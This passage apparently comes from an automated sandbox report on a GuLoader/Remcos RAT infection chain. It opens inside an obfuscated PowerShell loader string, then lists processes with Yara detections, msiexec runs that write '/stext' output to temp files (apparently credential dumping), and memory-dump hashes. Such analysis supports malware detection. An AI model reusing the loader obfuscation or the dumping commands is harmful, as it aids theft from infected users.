ConCooE.ng Pat=Erk la[ NosR kYsl s gat,npeTo mDe . reT G.EOsmxWintFul.abre ,iNC gCAlto Bad ejIHydNParGs i]Udb:Pan:sulAMotsDelC.veiKo,IMi . ArgInde ChTTilsFr TXerR Eni anDevgDec(Mal$ arKJa v ataGelNCamt skIBebTplee saTN nsMicMAfks glsManIHomGPe esqu)U s ');Donought (Capulet43 'Ni.$TakgspyLR.yOMidB stA A lsup: TiRComEPl n.igdDi.ePo,s.eptKatePronshaEOmoNsal=I d$ MasLikkKonaE,af .aFBabe.etr Ggn HeEs.o.AktsR.euAfbB es stT TorIntiB sNIroGA l(Pte$PecpL,gRthrE PrFAndeCalr.ulT alisgel WaI UvzuntA Wat.ariFraoBjeNDet, An$.irwV nA CoVBlaeB mnYa,UTrom,otBHaaEsupr yn1Ant) om ');Donought $Rendestenen;"
                    Imagebase:0xb00000
                    File size:433'152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2486808594.0000000008E10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2468395369.000000000609A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2487017781.000000000AA58000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:05:06:44
                    Start date:14/10/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:9
                    Start time:05:07:07
                    Start date:14/10/2024
                    Path:C:\Windows\SysWOW64\msiexec.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                    Imagebase:0x3a0000
                    File size:59'904 bytes
                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3406381912.0000000007BCD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:false

                    Target ID:12
                    Start time:05:07:23
                    Start date:14/10/2024
                    Path:C:\Windows\SysWOW64\msiexec.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ncxgt"
                    Imagebase:0x3a0000
                    File size:59'904 bytes
                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:13
                    Start time:05:07:23
                    Start date:14/10/2024
                    Path:C:\Windows\SysWOW64\msiexec.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ywcrugzm"
                    Imagebase:0x3a0000
                    File size:59'904 bytes
                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:14
                    Start time:05:07:23
                    Start date:14/10/2024
                    Path:C:\Windows\SysWOW64\msiexec.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\izpjvzjnjwl"
                    Imagebase:0x3a0000
                    File size:59'904 bytes
                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Reset < >
                      Memory Dump Source
                      • Source File: 00000002.00000002.2295757650.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 52daba9584dfb99a65288c575478418f1a67806db038a33bfc21cda18416d8b2
                      • Instruction ID: 8f09dd383f217ab38a0eba36aacf3355a67b26ef4dc3fea5f8b1f783d958d0a2
                      • Opcode Fuzzy Hash: 52daba9584dfb99a65288c575478418f1a67806db038a33bfc21cda18416d8b2
                      • Instruction Fuzzy Hash: 55F18430A08A8D8FEBA9DF28C8557F977E1FF55310F04426AE84EC7291DB78D9458B81
                      Memory Dump Source
                      • Source File: 00000002.00000002.2295757650.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dc6a4c38a36a38c97725c0dbbb873de55d413f1c518d75fd8bd44d587d07abdf
                      • Instruction ID: 1615d8bb848a6960658dbe84ebbbaf7198a1fc0928293d1dbc6efbf8113b5dcc
                      • Opcode Fuzzy Hash: dc6a4c38a36a38c97725c0dbbb873de55d413f1c518d75fd8bd44d587d07abdf
                      • Instruction Fuzzy Hash: ADE1B430A08A8D8FEBA9DF28C8A57F977D1FB55310F04426ED84EC7291CE78E9458781
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: `"y4$`"y4$`"y4
                      • API String ID: 0-57591438
                      • Opcode ID: b02bee785309a0317945d0374b10dbabf542eb63f9f54da023c68e4963f1d705
                      • Instruction ID: bf808c0032059d790974744cc36e0304891df660fdce88dd203add36a8f46f4b
                      • Opcode Fuzzy Hash: b02bee785309a0317945d0374b10dbabf542eb63f9f54da023c68e4963f1d705
                      • Instruction Fuzzy Hash: E051D672B0DB951FE759DF6888A51E8B7E1FF96350F0401BED08CD7193CE2868499B42
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: x#y4$x#y4$x#y4
                      • API String ID: 0-3301886177
                      • Opcode ID: e47f3abc09442989020c2a9ee87d0d1782db8c67f705f3503f020f9c6044cfbe
                      • Instruction ID: dc761198847bb87646029642680022dfb9b7d21597f96f89bae9d28878f0c210
                      • Opcode Fuzzy Hash: e47f3abc09442989020c2a9ee87d0d1782db8c67f705f3503f020f9c6044cfbe
                      • Instruction Fuzzy Hash: 08512322B0DB954FEB56EF6888A51A8BBD1FF56750F0801BED09CC71D3CE286845C742
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: x#y4$x#y4$x#y4
                      • API String ID: 0-3301886177
                      • Opcode ID: f5c504c9042a7f9f181a00313370fd1b9d1feebf314085cb719fb3af9af34ea9
                      • Instruction ID: 96c73df57ce24c6d6e64b8e24f527a102a048a9de08f9080e8d99b51738520e8
                      • Opcode Fuzzy Hash: f5c504c9042a7f9f181a00313370fd1b9d1feebf314085cb719fb3af9af34ea9
                      • Instruction Fuzzy Hash: C151F422B0DB954FE755EF6888A52A8BBE1FF56750F0801BED09CD7193CE286845C742
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 6vZ$6vZ
                      • API String ID: 0-1159232547
                      • Opcode ID: 7be224e200a133425531e9dd4055bc7eba3acd2de8f1659295b995e7537198ac
                      • Instruction ID: e4a962511bbdacac2a617f2affcbe0f7a43a0f915588f00e0d3170ee6bb32fe2
                      • Opcode Fuzzy Hash: 7be224e200a133425531e9dd4055bc7eba3acd2de8f1659295b995e7537198ac
                      • Instruction Fuzzy Hash: CAB10522B0EAAA1FEBE59F2C54B56F47BD1EF563A0B1801BAD14DC71D3DE19AC018341
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.2295757650.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8 {4
                      • API String ID: 0-3253280058
                      • Opcode ID: 2349b89898ea8c4001f5952404d5d1adb763d3b2896f5273f16a70ee954a6500
                      • Instruction ID: c08d35ff796ba2474105220a976f939d999b0baa089d575392664c0a8409305a
                      • Opcode Fuzzy Hash: 2349b89898ea8c4001f5952404d5d1adb763d3b2896f5273f16a70ee954a6500
                      • Instruction Fuzzy Hash: C3129331E0CA4A8FDB99DF5CC4A5AF97BE1FF59310F1401BAE449D7292DA28E841C781
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: ("y4
                      • API String ID: 0-2688744521
                      • Opcode ID: 86a5716aac8c0a8eaeacf1b1a349be86c9bb655f210e4e98c3c73093d9c8b715
                      • Instruction ID: 95fea10b32019d69e9af7f068788a84e921ac51b24c6823fd0f4100786e28152
                      • Opcode Fuzzy Hash: 86a5716aac8c0a8eaeacf1b1a349be86c9bb655f210e4e98c3c73093d9c8b715
                      • Instruction Fuzzy Hash: F0F0F432B0D9561FEBA9EE6C58E14B8A3C1DF9629070C09BAC14DC71C3E80CEC499B91
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ade95f467536c05ff6bb95c5f727c1c488f6f94a7c1a6e0e5bf0f05b2c479090
                      • Instruction ID: 8bf282b2b68917fe12fabb5fc6ad8fa67b89c1a6e6d05d70ba7ac13e815b732e
                      • Opcode Fuzzy Hash: ade95f467536c05ff6bb95c5f727c1c488f6f94a7c1a6e0e5bf0f05b2c479090
                      • Instruction Fuzzy Hash: 06E11522B0DA962FE7AA9B2858B52B47BD1EF53350B0801BED54DC71D3DE1DA8029391
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9844c3d95d7926d16d14c14a77622092839be6416bc5bbfe533074199f7f9f3f
                      • Instruction ID: 6eab6143ac8e34434330224754f3548f2d206faec513183b2b3e2320eeddc4b4
                      • Opcode Fuzzy Hash: 9844c3d95d7926d16d14c14a77622092839be6416bc5bbfe533074199f7f9f3f
                      • Instruction Fuzzy Hash: C3D14A32B0DA5A5FE7A58F2898A5AB477E1EF46392B1401BBC14DC71D3DE2DAC068341
                      Memory Dump Source
                      • Source File: 00000002.00000002.2295757650.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 695185e09126030a77e05e067384424ab6c0da010b0223f1a992d4ce84ba32b9
                      • Instruction ID: 61496afdc956fda625efd6797d0f5f7cd000d757145ec0596eddc22fc17f821b
                      • Opcode Fuzzy Hash: 695185e09126030a77e05e067384424ab6c0da010b0223f1a992d4ce84ba32b9
                      • Instruction Fuzzy Hash: 8AB19770A0CA8D4FDB69DF28D8557F93BE1EF55310F04426AE44EC7292CA78E9458B82
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a5656403465f2ce50f0f626b0496888d1e0d0b7252096b25a59770d478d98c6c
                      • Instruction ID: a718eec23cae6c036857d40ffab6cddc92e60096a7dceb719e0040fbdb895808
                      • Opcode Fuzzy Hash: a5656403465f2ce50f0f626b0496888d1e0d0b7252096b25a59770d478d98c6c
                      • Instruction Fuzzy Hash: BC510632B0EA965FEB698F2858B15F577E2EF57350B0901BBD189C3593DA1DE8018341
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ed2fcac84f3a715d66c6ac452f5699765578ceb34b92f9e7d912d37abc0868d1
                      • Instruction ID: 1b6484fe89b0c9a3af880e2f386adc1a9ba6227105b26fa7adff32f9f004c292
                      • Opcode Fuzzy Hash: ed2fcac84f3a715d66c6ac452f5699765578ceb34b92f9e7d912d37abc0868d1
                      • Instruction Fuzzy Hash: 9E51C132B0E7950FE7559F688CA52A8BBE1FF96250F0401BED089D7193DA6C6846C742
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2d02fc14bce78f3bc7127ce8e095f7919d00c30b70b3154f9e0475a8dca325be
                      • Instruction ID: 3d878438256a375318e9a8fc405adf1808b3e98ddb4e07e8034b30d5a2a93a78
                      • Opcode Fuzzy Hash: 2d02fc14bce78f3bc7127ce8e095f7919d00c30b70b3154f9e0475a8dca325be
                      • Instruction Fuzzy Hash: EF510362B0E7950FE795DF688CA51A8BBE1FF56250F0801BED088C71D3CE6CAC468742
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 82ef9c6478c773894a8930ea61ad7292da3f29f8d933af377d29dd06f6655a3f
                      • Instruction ID: 43de00e9c473ef8b2e9ef8988bbc1abfd0c0874c8a3b680bcae0f57c11cf75a2
                      • Opcode Fuzzy Hash: 82ef9c6478c773894a8930ea61ad7292da3f29f8d933af377d29dd06f6655a3f
                      • Instruction Fuzzy Hash: 5F31D412F1FAE72BE7F99B5818F61F866C1EF46390B4802BAD15ED31C3DD0CA8015242
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 87513141d809d2607b4eb0f09a3bb43ba34963172358ecd361b5f3f79a4c35ec
                      • Instruction ID: de7e1c454992bbda277c488173057315a5efe863fe9c15cd84d2e008cd6ec0a6
                      • Opcode Fuzzy Hash: 87513141d809d2607b4eb0f09a3bb43ba34963172358ecd361b5f3f79a4c35ec
                      • Instruction Fuzzy Hash: 3C213A22F1DA5A2BF3E99B5C18F42F562C2EF86391B4805BAD11DC31D7DE1DEC01A245
                      Memory Dump Source
                      • Source File: 00000002.00000002.2295757650.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 74e0f299a5d3c456caabc05ea790be40ba095be046dd5cbd9d5d4847014ddaa3
                      • Instruction ID: f51156912571174de63593c951a3811714ddebc0275f19827296e9bf086b3349
                      • Opcode Fuzzy Hash: 74e0f299a5d3c456caabc05ea790be40ba095be046dd5cbd9d5d4847014ddaa3
                      • Instruction Fuzzy Hash: EE310E30E2968E8EFBB5AF14CC6ABF93290FF46315F400179D50EC6192CA7CA985DB11
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6e150063fed673c904223eb8fbc900ce118b6cea3939cf4de5f34a6ece4bbd5f
                      • Instruction ID: b22778ff69b9c84530fea6ee30cd49dcfe8cfb1f75c64822a1c675a95e146b98
                      • Opcode Fuzzy Hash: 6e150063fed673c904223eb8fbc900ce118b6cea3939cf4de5f34a6ece4bbd5f
                      • Instruction Fuzzy Hash: 61212312F0E9C62FE759DB2C18B51F86BC2EF56640B4806BED09ECB1D3CC1DA8029351
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 967645b931e28ac95061466225c9a36ab9394cfb947c4940f427a496757a73dd
                      • Instruction ID: 72638fb9e2b091008b2fa50c624ee7b0102cda561c5cb981b07108f7ba4a6665
                      • Opcode Fuzzy Hash: 967645b931e28ac95061466225c9a36ab9394cfb947c4940f427a496757a73dd
                      • Instruction Fuzzy Hash: 9211B473B1DA2A6AE764CF4854E01F663C3EF567A0B59007AC18ED3991D91DF8025240
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d713a63f59dafc3fcd3545163dbb8c3f3b57c0543d6c4c51b28b9ddfc022016e
                      • Instruction ID: 0d62257b42768afd202efe271f79b6a5a3a63da2891b88d83882a07681d1bca5
                      • Opcode Fuzzy Hash: d713a63f59dafc3fcd3545163dbb8c3f3b57c0543d6c4c51b28b9ddfc022016e
                      • Instruction Fuzzy Hash: B8014232B0D8590FEBA0EE6C98944E9B7D1EB6935070401BEC249D7192DE18BC469380
                      Memory Dump Source
                      • Source File: 00000002.00000002.2295757650.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                      • Instruction ID: a672d786bb9ed61803592060547b06b7ef313ca1211a3373d9c0bf327fbdf357
                      • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                      • Instruction Fuzzy Hash: 2301447121CB084FD744EF4CE451AA5B7E0FB95364F10056DE58AC3655D626E882CB45
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6199a48b9eb0e878c461a92c6f12a0da2e5449ea0651ffbfc363ac680f5a1347
                      • Instruction ID: 680e728630733aa4e5e5b4a7004cc31393093040dc76587fbdb166931bfa914e
                      • Opcode Fuzzy Hash: 6199a48b9eb0e878c461a92c6f12a0da2e5449ea0651ffbfc363ac680f5a1347
                      • Instruction Fuzzy Hash: AE01F732B099955FEF51DF588CA94E8BBA2FF1534174400BEC149D7192DA28B846D741
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 63537f6efb5335f04d57b2ea308556c5a8fc9274c2493c3fa49dce055ba80f22
                      • Instruction ID: c546b8151e94990ad4e6a1e9f70af11d26111be2025b9d76aefd20f2d26029d4
                      • Opcode Fuzzy Hash: 63537f6efb5335f04d57b2ea308556c5a8fc9274c2493c3fa49dce055ba80f22
                      • Instruction Fuzzy Hash: 1EF03031B09A498FDF91EF9888555E9B7F1FF6931170001BAD109D3152DA28A845C781
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 63537f6efb5335f04d57b2ea308556c5a8fc9274c2493c3fa49dce055ba80f22
                      • Instruction ID: aae571a2b3b3d0cbbc95353745be81c27384a0c5d7922f5e3f8e1b1e7a48a471
                      • Opcode Fuzzy Hash: 63537f6efb5335f04d57b2ea308556c5a8fc9274c2493c3fa49dce055ba80f22
                      • Instruction Fuzzy Hash: 12F03031B09A494FDF91EF9888555E9B7F1FF6931170401BAD109D3152DA28A849C781
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 21e7270a63de677b26a8adf1a2a6179633b7955a34201cab948584c2bffa4784
                      • Instruction ID: c9fcc1e1d317e9458449948361dc99c78a328c83271b90c80964d3de34359838
                      • Opcode Fuzzy Hash: 21e7270a63de677b26a8adf1a2a6179633b7955a34201cab948584c2bffa4784
                      • Instruction Fuzzy Hash: 72E0D833B0DA1609FB5C5A5C38620F973D1EFC5160744047FD24ED2483D81AA8164640
                      Memory Dump Source
                      • Source File: 00000002.00000002.2296767963.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6b73fb37f5134a8b26d22d250f2dfa0a8bc4db38d841d49f7f6c5008d9cf4e21
                      • Instruction ID: 7e1eeb19319eb5770cde4e0916de9990b9796bb4186d48412877391558e85f27
                      • Opcode Fuzzy Hash: 6b73fb37f5134a8b26d22d250f2dfa0a8bc4db38d841d49f7f6c5008d9cf4e21
                      • Instruction Fuzzy Hash: E4E04F3170DA494FEFA5EF5C98E19A4B7E0EF6931031805EAD009CB197D92DEC85CB91
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.2295757650.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: ,N_^$-N_^
                      • API String ID: 0-4029621914
                      • Opcode ID: e146b4ded594673e96663a26809f291963f7da083d21567d7e35cc5090978b4f
                      • Instruction ID: ea224d65517f1ab1d9f358bf48ee460f1e05aa077c2aff65a63e12fab5ed4af5
                      • Opcode Fuzzy Hash: e146b4ded594673e96663a26809f291963f7da083d21567d7e35cc5090978b4f
                      • Instruction Fuzzy Hash: 40517357E0D7D61BE723977C18F60E96F95EF13268B0A01F7C6D6CE093AD0C68066252
                      Memory Dump Source
                      • Source File: 00000002.00000002.2295757650.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a0a7b8e41c7b0cc0712135afa8406c9e81464c1f9301961dc29446ea0044956c
                      • Instruction ID: f2d51601d96fec1ccacc5e82ff7df0b4d6effb4255030dde7f30a7617c2f2177
                      • Opcode Fuzzy Hash: a0a7b8e41c7b0cc0712135afa8406c9e81464c1f9301961dc29446ea0044956c
                      • Instruction Fuzzy Hash: 9FD16A97F0F6C65BE763566858F60F93BA0DF5326471901F3C6D9CA0B3DD0CA80AA252
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 50bf15036ba87e8a27cafbbc08908ca122ed207361623938071e4640c361b66e
                      • Instruction ID: c229b07d1acf50b35958d3ae1e642952a2d3b259a7f0d2d7a9e06174afeeb387
                      • Opcode Fuzzy Hash: 50bf15036ba87e8a27cafbbc08908ca122ed207361623938071e4640c361b66e
                      • Instruction Fuzzy Hash: 47B16270E00259DFDF10CFA9C8857EDBBF2AF88718F149529D416A7254EB74A846CF81
                      Memory Dump Source
                      • Source File: 00000004.00000002.2450707412.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4ed0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: efdf0d219fee2162cfc5d3ec04cc9dc1d6c5e4453cfa0be6ffba139a8bf0e95b
                      • Instruction ID: 85630ea8e08b4fb7e28c13fdd1db4b21c04fa4b6f2f37ee8567dcf7fe7fcdbcc
                      • Opcode Fuzzy Hash: efdf0d219fee2162cfc5d3ec04cc9dc1d6c5e4453cfa0be6ffba139a8bf0e95b
                      • Instruction Fuzzy Hash: A9B16270E00249DFDB14CFA9D8857DDBBF2AF88318F149529D816EB254EB74A846CB81
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2479687000.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7c40000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: (f^l$(f^l$(f^l$(f^l$(f^l$(f^l$(f^l$(f^l$(f^l$tLPk
                      • API String ID: 0-3036511255
                      • Opcode ID: ee9edf0849ee01c1637222e1038dd4a163ace5efafe1409461f5b45f994af511
                      • Instruction ID: 12ca77c7fd9e8de61134ea4207195ac61fbf0a063ab5d56c5fd908243a728a48
                      • Opcode Fuzzy Hash: ee9edf0849ee01c1637222e1038dd4a163ace5efafe1409461f5b45f994af511
